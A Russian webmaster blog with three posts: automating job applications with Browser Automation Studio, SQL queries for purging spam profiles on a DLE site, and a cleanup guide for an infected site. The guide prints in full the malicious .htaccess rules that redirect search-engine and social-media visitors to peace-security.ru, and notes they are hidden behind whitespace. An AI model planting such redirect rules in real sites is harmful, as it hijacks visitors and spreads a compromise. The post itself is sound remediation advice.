Попробовал browser automation studio.

Всем привет!

Свой первый пост в этом году начну, пожалуй, с поздравления — с Новым 2019 Годом! 🙂

Пусть этот год приносит только позитивные эмоции во всех сферах — от личной жизни до заработка в интернете!

Свои итоги года я подводить не буду — нечем похвастаться, 2018-ый пролетел как в тумане, по ряду причин. Теперь вся надежда на этот год 😉

Сидели мы как-то с другом за бокалами пива, и тут он мне говорит: «Слухай, напиши скрипт, который будет автоматически откликаться на вакансии, на одном крупном сайте по поиску работы». Ну, задача интересная, поэтому ночью того же дня, я сел писать скрипт. Сначала думал воспользоваться зенкой, но, поковыряв ее немного, понял — надо искать что-то более простое для меня. В итоге родилась связка Content Downloader + browser automation studio. Решение временное, но рабочее 🙂

  1. Content Downloader’ом собираю страницы всех вакансий по заданному ключевому слову. Сохраняю список в файл.
  2. Дальше в дело идет browser automation studio — по списку открываем в одном потоке страницы вакансий, находим первую кнопку «Откликнуться» (вот тут пришлось попотеть, чтобы выделить ее из двух). Нажимаем. Ну и проверяем, разбирая исходник страницы — требуется ли отправить дополнительную инфу о себе? Если да, то идем к следующей вакансии, если нет, то нажимаем кнопку «Отправить» и работаем дальше в цикле.

Что можно было сделать лучше (чмбсл), как говорят пикаперы? Ну во-первых, парсить через browser automation studio вакансии напрямую и дальше их обрабатывать, во-вторых — автозаполнение анкеты, в случае, если это необходимо. В любом случае, еще есть время доработать скрипт, пока новогодние праздники не закончились 🙂

Общее впечатление от browser automation studio — отличный софт, по крайней мере для таких простых действий. Есть конечно парочка неоднозначных моментов, в логике работы программы, но однако ж и с ними можно разобраться. Средняя скорость в одном потоке — секунды 2-3 на одну анкету.

Собственно так и учусь потихоньку автоматизировать простые действия 🙂

Теперь изучаю материалы к новой задаче — реализация парсинга и обработки json на php. А точнее связку ajax + php, чтобы динамично парсить данные и выводить их на сайте.

А чему вы научились за последнее время? 🙂

last comments
seoonly.ru
seoonly.ru

нормальная тема!
Александр
Александр

Отличное решение с этим вариантом по использованию browser automation studio. Главное, что всё просто, без заморочек.

Удаляем ссылки в профилях пользователей на сайтах под управлением DLE

Недавно, на одном купленном мною проекте под управлением DLE, возникла проблема — необходимо было удалить все профили пользователей, содержащие ссылки на сторонние ресурсы.

Задача оказалась крайне простой — буквально 5 минут работы 😉

1. Лезем в phpmyadmin, авторизуемся, заходим в базу данных сайта.
2. Находим таблицу dle_users
3. Проверяем наличие профилей с ссылками, задавая следующий sql-запрос:
select * from `dle_users`
where (`info` like '%http://%') or (`signature` like '%http://%')

(обычно спамеры оставляют ссылки в инфе о себе или в подписи.
4. Задаем sql-запрос на удаление этих профилей:
delete from `dle_users`
where (`info` like '%http://%') or (`signature` like '%http://%')

Вуаля, проблема решена.

5*) Можно так же просто очистить все ссылки из профилей, без удаления самих пользователей:
update `dle_users`
set `info`='', `signature`=''
where (`info` like '%http://%') or (`signature` like '%http://%')

Внимание!
Скажем так, данные решения не самые точные. Могут и добропорядочные пользователи под раздачу попасть, так что пользуйтесь данными советами аккуратно.

last comments
slava
slava

Спасибо! давно чтото подобное искал ща попроббуем что это даст.. Надеюсь что поможет ато не охота сами профели удолять.

Первый пост. Про peace-security.ru

Приветствую Вас на страницах своего блога. Скорее всего, сюда вы попали с моего прошлого блога 4partners. Переезд на новый блог состоялся по одной простой причине — старое название мне разонравилось :-), к тому же оно не описывало идею блога.

Этот блог надеюсь вести регулярно, описывая больше практическую сторону заработка в интернете, добавляя переводы интересных англоязычных статей и обзоры свежих новостей SEO.

Долго думал, о чем бы написать первый пост (окромя приветственных речей), но тут подвернулась одна проблема, с которой столкнулся буквально позавчера.

Симптомы: При вводе несуществующего адреса на вашем проекте (напр. http://www.VASH-BLOG.ru/abracadabra) — происходит редирект на http://peace-security.ru/mod/index.php

Решение проблемы: Столкнувшись с данным вопросом решение обнаружил не сразу. Выяснилось, что в коде файла .htaccess прописывается следующая гадость:

ErrorDocument 400 http://peace-security.ru/mod/index.php
ErrorDocument 401 http://peace-security.ru/mod/index.php
ErrorDocument 403 http://peace-security.ru/mod/index.php
ErrorDocument 404 http://peace-security.ru/mod/index.php
ErrorDocument 500 http://peace-security.ru/mod/index.php
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L]

Есть один маленький нюанс — данные директивы прописываются в файл .htaccess с большими оступлениями от начала строки… поэтому просто сделайте поиск по файлу — и смело удаляйте и директивы и пустые строки.

Одним из способов обнаружить заражение является появление большого количества .htaccess файлов во всех каталогах вашего сайта.